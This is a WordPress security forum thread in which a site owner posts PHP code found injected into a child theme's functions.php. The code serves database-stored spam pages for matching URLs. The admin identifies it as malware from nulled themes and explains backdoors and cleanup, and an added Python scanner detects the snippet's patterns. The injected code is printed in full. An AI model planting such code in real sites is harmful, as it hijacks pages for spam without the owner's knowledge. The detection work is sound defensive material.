Suspicious Theme functions.php file code – nulled/pirated plugin or theme


This topic contains 5 replies, has 2 voices, and was last updated by  AITpro Admin 8 months, 2 weeks ago.

  • #33805

    Vintagepornbay.com
    Participant

    So what's the purpose of this code? I don't understand. It was found in our child theme functions.php:

    I think it's related to request attacks logged in BPS logs.

    if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM ' . $wpdb->prefix . 'datalist WHERE url = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
        {
            print stripslashes($data -> content);
        }
        else
        {
            print '<!DOCTYPE html>';
            print '<html ';
            language_attributes();
            print ' class="no-js">';
            print '<head>';
            print '<title>'.stripslashes($data -> title).'</title>';
            print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
            print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
            print '<meta name="robots" content="index, follow" />';
            print '<meta charset="';
            bloginfo( 'charset' );
            print '" />';
            print '<meta name="viewport" content="width=device-width">';
            print '<link rel="profile" href="http://gmpg.org/xfn/11">';
            print '<link rel="pingback" href="';
            bloginfo( 'pingback_url' );
            print '">';
            wp_head();
            print '</head>';
            print '<body>';
            print '<div id="content" class="site-content">';
            print stripslashes($data -> content);
            get_search_form();
            get_sidebar();
            get_footer();
        }

        exit;
    }
    
    #33807

    AITpro Admin
    Keymaster

    The code appears to be malicious.  Google searches indicate that the origin of that code may be from nulled/pirated plugins or themes downloaded from this website:  dlwordpress.com or other similar sites.  It is very common that hackers will offer free nulled/pirated plugins and themes and add hacker code in those nulled/pirated plugins and themes.  The code may not necessarily have come from an installed nulled/pirated plugin or theme and may have been used independently, but it is much more likely that you have a nulled/pirated plugin or theme installed on your website that is automatically creating/injecting that code into your theme functions.php file.

    Google Search results for search string:  if ( $wpdb->get_var('SELECT count(*) FROM ' . $wpdb->prefix . 'datalist
    https://wordpress.org/support/topic/wp-database-error-doesnt-exist-select-count-from-wp_datalist/
    http://kanec.co.uk/2016/11/05/perils-nulled-wordpress-themes/
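
An added example, not part of the original thread or of BulletProof Security: a Python scan that flags PHP files carrying the traits of the snippet posted above (the `datalist` table lookup keyed on `REQUEST_URI`, followed by printing database content). The indicator patterns come from that snippet; the function names, the two-hit threshold and the sample files are assumptions constructed for the example.

```python
import re
import tempfile
from pathlib import Path

# Indicators taken from the snippet quoted in this thread (not a complete signature set).
INDICATORS = {
    "datalist_table": re.compile(r"\$wpdb\s*->\s*prefix\s*\.\s*'datalist"),
    "request_uri_in_sql": re.compile(
        r"SELECT[^;]*\$_SERVER\[\s*['\"]REQUEST_URI['\"]\s*\]", re.I),
    "mysql_escape_string": re.compile(r"\bmysql_escape_string\s*\("),
    "prints_db_content": re.compile(r"print\s+stripslashes\(\s*\$data\s*->\s*content\s*\)"),
}

def scan_file(path):
    """Return the sorted names of the indicators found in one PHP file."""
    text = Path(path).read_text(encoding="utf-8", errors="replace")
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))

def scan_tree(root, min_hits=2):
    """Map relative path -> indicator names for PHP files with at least min_hits hits."""
    root = Path(root)
    findings = {}
    for php in sorted(root.rglob("*.php")):
        hits = scan_file(php)
        if len(hits) >= min_hits:  # assumed threshold: one hit alone is weak evidence
            findings[php.relative_to(root).as_posix()] = hits
    return findings

# Constructed sample files: a clean child theme and one carrying the thread's snippet (abbreviated).
CLEAN = "<?php\nadd_action('wp_enqueue_scripts', 'child_enqueue');\nfunction child_enqueue() {}\n"
INFECTED = CLEAN + r"""
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'
    . mysql_escape_string( $_SERVER['REQUEST_URI'] ) . '"') == '1' ) {
    $data = $wpdb -> get_row('SELECT * FROM ' . $wpdb->prefix . 'datalist WHERE url = "'
        . mysql_escape_string($_SERVER['REQUEST_URI']) . '"');
    print stripslashes($data -> content);
    exit;
}
"""

def demo():
    """Build a throwaway wp-content tree from the constructed samples and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        themes = Path(tmp) / "wp-content" / "themes"
        for name, body in (("clean-child", CLEAN), ("infected-child", INFECTED)):
            (themes / name).mkdir(parents=True)
            (themes / name / "functions.php").write_text(body, encoding="utf-8")
        return scan_tree(tmp)
```

To check a real site, call `scan_tree()` on the hosting account's document root; a flagged file still needs manual review.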

    #33808

    Vintagepornbay.com
    Participant

    I have used a nulled plugin before.

    But I currently don't have it now.

    Which plugin could cause this auto changing of functions.php code?

    #33809

    AITpro Admin
    Keymaster

    You need to assume the worst case scenario > your entire hosting account is hacked/compromised.  Typically hackers will add code in nulled/pirated plugins and themes that not only injects/creates code wherever they want, but also adds a backdoor login to your hosting account that gives them total control of your hosting account environment.  You will need to clean up your entire hosting account.  We have created a help forum topic about how to clean up a hacked hosting account here > https://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/

    #33836

    Vintagepornbay.com
    Participant

    Is it possible for a subdomain (subsite) to affect the main domain (main site)?

    Because we use a nulled theme and plugin only in our subdomain.

    #33837

    AITpro Admin
    Keymaster

    Usually hackers will install/upload a backdoor shell script somewhere in your hosting account folders that allows them to edit/upload/add files and many other things.  Typically hackers do not usually do anything to your WordPress database like add hacker code in your database.  A backdoor shell script does give a hacker the ability to create WordPress Administrator user accounts in your database.  So normally you do not need to back up and restore your WordPress database and just need to check for any Administrator accounts you did not create, delete them and then do the other steps in this forum topic:  https://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/
